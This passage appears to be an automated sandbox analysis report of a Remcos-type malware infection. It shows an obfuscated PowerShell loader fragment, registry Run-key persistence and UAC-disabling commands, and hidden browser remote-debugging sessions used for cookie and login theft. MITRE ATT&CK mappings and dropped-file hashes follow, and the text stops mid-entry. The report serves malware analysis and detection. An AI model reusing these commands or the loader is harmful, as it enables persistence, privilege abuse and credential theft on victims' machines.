L.vtJa.bHDugdOBugsL.amidPortebeverEpikeSt pSForp=Chef( ennTRutiE AllSKon.tSynt-St pPGlamaLib.T PerH iga Spi$F avVStaba abeSS ara.pruL .lgldan EDis RSupinc,rbE.aro)');while (!$Teltholderes) {Uniformistisk86 (Burntweed 'Gene$BordgTilvlheteoRodobP ogaafdalHypo:GritSBy,njMetaoB rofUdvaeUnderln.ntEfteetopp1Oven9Hjem4Tube=Mika$sulfB A seOptesTilstSkamoPr grUnmimf,rle Forl armsHavieSamdnT ers') ;Uniformistisk86 $Corrading;Uniformistisk86 (Burntweed 'TempsRgestAll aFichR.isaTosch- sulsDe,lLKurseLa rePalePmese Over4');Uniformistisk86 (Burntweed 'Meni$En uG TetLSen,oOverBAkryA BibLI.vo:Hat T Me eEpicLGnetT epeh,ophoBoksl ZiadFl.rE SacrLaaneForbsVen =Opva( BletFigeeUndgSBedrtKimm-For p Fava aptInh Hvedh Enva$S llv shoAFlamSMdelAO.thL EnhLIreneAtesRCampNNonaELept)') ;Uniformistisk86 (Burntweed 'Sulf$PopuGTa,tLUnc OStitB MarAMaskLShar:KredsNomit allOLsblr BrikCot.B TieSBash=For $ revGS,erLtoshODaabBN ncaStralblac: okkmAboreAm lLLu,aL Ou E e,eM RhysVaabT QuiaJenmDturmIAlarEGrmmrMoti+Chry+Ma i%Moni$Bo rlmu aeUvedgBestistarTTastiAlgoM BaniDramZRetleCribRHols8Inst3 ilt.Resec iljoJudau,uasnTospT') ;$Tumpline=$Legitimizer83[$storkbs]}$Seneskedenntrudress=320480;$Personificerede=30318;Uniformistisk86 (Burntweed 'Swan$S.dlGStilLLedeoTidsB Giga.rveLUros:ReprA Chon SubiTse S agB BruoUnreLAryaC EsuhEft eBaghSQuib Waft=Reac UrdeGRasteHrf.TStvn-huleC.rneOTo,bnM ndTSlamE Godn nrat eas Afsk$OppeVMetaAud.mS orba P alkovelUltrEFro RUnrun Deke');Uniformistisk86 (Burntweed ' Sm $ Se g F.llPhy oRengb DiraMerclFond:HuslSCoatlUnthuUnegbS rmr EntePatatCyli Syn =St i Gru [Co tS Na,yDrm.sWar.t En eBranmtouc. Wo.C ccroschwnHurrvInteeUnc rPr ttCh o]Psy,:Hen :Sn rFl forCowboHandm jerBDestaEffes Mule onc6 Unt4YnglSUnpotBendr ,roiTandnPlumg .no(Udvi$StavaStavnFilmiTho,sSpeabGilloMicrlDiv c PhahordneU imsMart)');Uniformistisk86 (Burntweed 'Hnde$ FodG.ndul FakOP,anb OttAOverlTe e: BygS Volp OmoEgrydk Bact emiRAr oO SynGActiR KonaPodof ModeN.tenBefosUnvi Ska =P ot Un,a[T adsYderyTegnSHe it SkyeUnenmBe,k.Ozelt oveE ParX onTFrit. naEPorknS.ntCPrepOSel.DSkumI ChenForhgRust]Kloa:Noum:LyseALangS,vilcSyleIThisi O j. Kung,upeESu,etShipSAndeT B sR PlaI UnsnSnozg Sat(I df$SkrusIterLTaxiUKommbTyngR DoneIntotUnri)');Uniformistisk86 (Burntweed 'Excu$LinkgAlveL P roSvanBB reAVandl.hri:MateCke kE E.sR yrseKommmWildo KarN BijIS reaGrunlWaspIIntesCoe,MFo d=Unde$Ti.bSCy lpcoacESunskUnaltVelbRSultOProggIne rMineAAferFR ceEfagbNTimbSCavi.neglsEkskUNectBSjussBasttprecrJagtiUns.NUdlaGUnde(Bede$ForeSDiste jesNMiekEHjl,SRe,ik Enge B.lDS orEFo aNArc N FarTSt lRTunguFlerDAfbrrCh.ieSa as Atts un, ety$enk.P BehE ubvrSileSFiluo Gr NClauIHaidFUnr IJordCAnt.eUpg RAspieRelaD,iffEfrad)');Uniformistisk86 $Ceremonialism;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4332
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2604
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%baggrundshistorien% -windowstyle 1 $Lagertilgangens=(gp -Path 'HKCU:\Software\Alperoses\').Inddrev;%baggrundshistorien% ($Lagertilgangens)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3424
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%baggrundshistorien% -windowstyle 1 $Lagertilgangens=(gp -Path 'HKCU:\Software\Alperoses\').Inddrev;%baggrundshistorien% ($Lagertilgangens)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:3932
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4044
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:432
- - C:\Program Files\Google\Chrome\Application\Chrome.exe
    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:936
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff97684cc40,0x7ff97684cc4c,0x7ff97684cc58
      4⤵
      PID:3144
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,15772188081543181853,14162882137120020980,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1920 /prefetch:2
      4⤵
      PID:4940
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2152,i,15772188081543181853,14162882137120020980,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2372 /prefetch:3
      4⤵
      PID:3500
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2184,i,15772188081543181853,14162882137120020980,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2380 /prefetch:8
      4⤵
      PID:2240
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,15772188081543181853,14162882137120020980,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3616
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,15772188081543181853,14162882137120020980,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3232 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:2160
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4148,i,15772188081543181853,14162882137120020980,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4568 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1500
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\cbgutquadjobejgfkcexpvpnhmcg"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4828
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mvlmuafcrrgghpcjtnzzaajeitupmdf"
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mvlmuafcrrgghpcjtnzzaajeitupmdf"
    3⤵
    - Accesses Microsoft Outlook accounts
    - System Location Discovery: System Language Discovery
    PID:3148
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\pprfutxvfzytrdqnkqlsdnevqhdyfoefxs"
    3⤵
    PID:3636
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\pprfutxvfzytrdqnkqlsdnevqhdyfoefxs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4328
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:4172
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9767046f8,0x7ff976704708,0x7ff976704718
      4⤵
      PID:4892
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,1547730148011594560,5703831152046022703,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
      4⤵
      PID:3568
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,1547730148011594560,5703831152046022703,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
      4⤵
      PID:2868
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,1547730148011594560,5703831152046022703,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3008 /prefetch:8
      4⤵
      PID:4632
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2100,1547730148011594560,5703831152046022703,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2140 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4812
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2100,1547730148011594560,5703831152046022703,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3344
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2100,1547730148011594560,5703831152046022703,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4144
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2100,1547730148011594560,5703831152046022703,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3844

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3932

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2196

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:220

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

T1556

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Authentication Process

T1556

Modify Registry

T1112

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
a2aae3112d032b0f4c51c0f5177a0e17

SHA1
e2c895905f48d55180b9fbaed66bacb900016c3f

SHA256
64afa3c26c98a202928420ac0c4ebeb96ecc11496f580ded2468770d93944d94

SHA512
b41d92b2aef3e2e752a9beef77ee569f1cd27bbac0987e36b905fa9543bc98761cf5bc9835e86a2d835b81a8ffa8af9c39913e4629e66b89bd773e230595cad1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d336b18e0e02e045650ac4f24c7ecaa7

SHA1
87ce962bb3aa89fc06d5eb54f1a225ae76225b1c

SHA256
87e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27

SHA512
e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
58304b6a3a834cfd8b245a3bfd754a69

SHA1
5695d3d43627036f47e0dbb9222d901c4114f552

SHA256
de5d9bc19323d867b42af0097e3ae17a10b004fe295930db9161691d1063ce23

SHA512
88731d9e435dc8ebd4aee3d16e304abf78e65462b9cd81e0b667f26d2d548c5c7dd09d0136eb7128476eeca70fa4cf0e3f2a412c74177c40b46c77c175ed5b74

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
39f71710ff35086c2a0d0b0ac9396caf

SHA1
e46a71f2765b627060df572d69cf50d36a4f025b

SHA256
c934fdad1c0379ea77a2e7d7809e556508d92421ce09760aa3fc0322a29e2680

SHA512
f90b12ec906c357baeb622d9d5e5748ca11339a65d8666f07b481e42c256db960f342f9e4cf30ab0b4cba4c326d7560290cc9c8aad07c748f180f5ad302f8236

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
cc1f43fb3cf12e5ffb1393b87769e376

SHA1
83e3a78d973919716f1629e2ea4e77ab78c7f138

SHA256
d867a2aaf12f77092c58ab63d24416e6454007c755f747bfa65014526ca76d3b

SHA512
3593805f322f58c6b583056d777bf25545fe14b93643db79ece84c039a0bb8940d7ef681f6da9b52666f9908ea9dfae3bef84498221588917fc733b4db5957e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
40B

MD5
84df45ef32ecddef7e78151066a9c9d8

SHA1
e0f2d6a3619857eb10af83fa5709525a05b86362

SHA256
d14311e9516bcd7365a63def7cca2d5daef1b5e5ace697cef538e6a1ed35c216

SHA512
c973104eb31d5e589bbac23b1cae63988958f49d1f918478345baf168d0e8439806fac7551b8645602e8f467ec77d04749e13c135ca3671677c26715d179318d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

Filesize
20B

MD5
9e4e94633b73f4a7680240a0ffd6cd2c

SHA1
e68e02453ce22736169a56fdb59043d33668368f

SHA256
41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304

SHA512
193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Cache\Cache_Data\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
2f3bd0f9c638eb6d729a674f8da1b73d

SHA1
259cb93db2375cad2afd1f4b7e038335c56bf3a3

SHA256
cb09471aeba5c2c75416331025a0bd7659452b8cd7370a9de47116babb36d349

SHA512
b43914a02d9c3566cba876f72439258028bbd021cb1bdc7879d7fef154e9ac4878179bbbf4ea8d70d6d93fa37e410f878001ea5dce6505e5964462e956b57e86

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\the-real-index

Filesize
48B

MD5
fd993f81531814b182d993ed6d894388

SHA1
60d6bced521737448fa16cd6550e94139c50ba5a

SHA256
7f0ad9d583d7ce8176a973571c6f11e53e7c3b966b2b5651abc965a22482b49b

SHA512
fa340563ab3945e6949331eaaced5daf7f04d6d019ffc6f0765929b8c387d4f2a9f5316a35582c170ad4df3539de5853c1aaa87dc709bf84e8fd0e7fe3928f56

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Extension State\LOG

Filesize
263B

MD5
40bb450a01f82b4ef8afe0f09b7575c6

SHA1
9b8e0a90e1ac619f8a5de1ad1e05dddaad779b1a

SHA256
fda2210aeb37b899da4e8e4d1528d7f16e2631403574a1023c1356a042414d0e

SHA512
82c14765aaa138fe59302742ae90c189566d11e7e1b08f1de930a583426e32bfaab765b8fc159cb08dadb2323320361f1610863972832b556eb46de8d2098c30

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

Filesize
20KB

MD5
b40e1be3d7543b6678720c3aeaf3dec3

SHA1
7758593d371b07423ba7cb84f99ebe3416624f56

SHA256
2db221a44885c046a4b116717721b688f9a026c4cae3a17cf61ba9bef3ad97f4

SHA512
fb0664c1c83043f7c41fd0f1cc0714d81ecd71a07041233fb16fefeb25a3e182a77ac8af9910eff81716b1cceee8a7ee84158a564143b0e0d99e00923106cc16

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

Filesize
256KB

MD5
abb48234bcc5229c76f6966a460b27e0

SHA1
8fd42aa1df561baceec6d0e8372c39302c02c28c

SHA256
8656aa194d564e225d8a3731b708fa6f6cb3efad7964070bbeccdd904e59a159

SHA512
4a5a3ae559b907abed737260aa6b6357ae9414c1f2686786fe811b0b0707d38ab9abdeea1aa51b6a41c3ecba2d4afbf33bd0e0574f9399f7521e30b0d71df37b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

Filesize
192KB

MD5
c679d69ca97e371b4008d9eab34ebdd9

SHA1
42d4f4b10ed0109aa87cd94e3cc9564167a60479

SHA256
849f2375726a9135ff618822f16b4aae9d4a4cc0767b070853cf3760482e8261

SHA512
11b066ff662952546e4a7810fafeffea3ce6bf6d58f3d7284e8a13df2f2c373ddf412ed5cabb785879bed4b35196ba36c1b26c3ed4a83d3e3f8c827dbb4788f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History-journal

Filesize
8KB

MD5
40d3790a02ff9cf05460ea541495ec05

SHA1
dd60f1b9ab54fd8d2675e92b475e9499e5be3e67

SHA256
ddefd3ac9f233c76a3406cb2a7ee3b7c24c748814d36618c4a37f027c5b92490

SHA512
6bd1dbc7b437b6eb4512accc670c5edf606fbfe5efff350120016e8e702563fde13aabd99e2537d0b57cf5fde3f031fcf573c8c6815fbf4366d729c75976f041

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

Filesize
275B

MD5
22ba5609cecd669c9430bff6c80c49bb

SHA1
d590f9fa659da0141590eb7eaf93a9ccfb24d9e4

SHA256
38ff5cf0b4c2dab6e5a37feebfa54773115946cb2d154658fd15c3f3cd760a69

SHA512
5c44c5bf5c2eada01c5b3500704c845b22eae1b4a53a2b168aaa401703ba528c7e0350ad2d46b6e9935d0c8e0676c59c39b1231acbae56093f2ee26d92cf6c6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

Filesize
1KB

MD5
7cb8e1a894a10d8b1679bd1b65d2d470

SHA1
42da6f6f1a97dbcbc4bb117d1c365569df267d48

SHA256
17a759107d309befcd369c46499d0f9cce3ba61da3c257d4815b05bebb2382ca

SHA512
b126897acc8e7210f3a0c1b781db9b6c7b89d836ae189ee14509aa3e04a5c5c65762732e426152b156000c1400b8d32aca6a6d69225bf1b12be640bf8b7e0eb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

Filesize
20KB

MD5
a1cf474295b62734ca4af000c7e08142

SHA1
2e26e09ecc08ed1de6d580b14555e51db2ae8f15

SHA256
ef4842a6e36b207b19d3edd63da5524c555582455771c1502c593af40a61631a

SHA512
d684a223bf44f2a64a92c92f3273c0e6c3cb32aea82a8ea8879b36bc1df4daa65711c01c7b4982715e735877bf72fa6382d3e777dee75f14b54a1905c30a2fa1

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

Filesize
1KB

MD5
4165d9f553c78912d2bb0e9183ba96ea

SHA1
05ad7cd959182da16ef0fe6e79da5bb088de1bd0

SHA256
fd167035a1666b9bcf3084348476b1a2082f788dc75526a1e6bcfd1b6cd48ceb

SHA512
70e2e5a32a91472790e52e51ace7cb1bc1d69b4a24963553ad5ba77c2b00399e4d42898749fa51ba04db38992cae7b2d153733c820efe71b3ee662cfb57e17ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

Filesize
5KB

MD5
690303dfc06bbd5865d44d3f7a451301

SHA1
0c222d7642df391a457b43fcb55e841d609e6694

SHA256
43ed42f3092fb3c26a53affedbba59d7405f11077b255872d461ba8cee6da2d2

SHA512
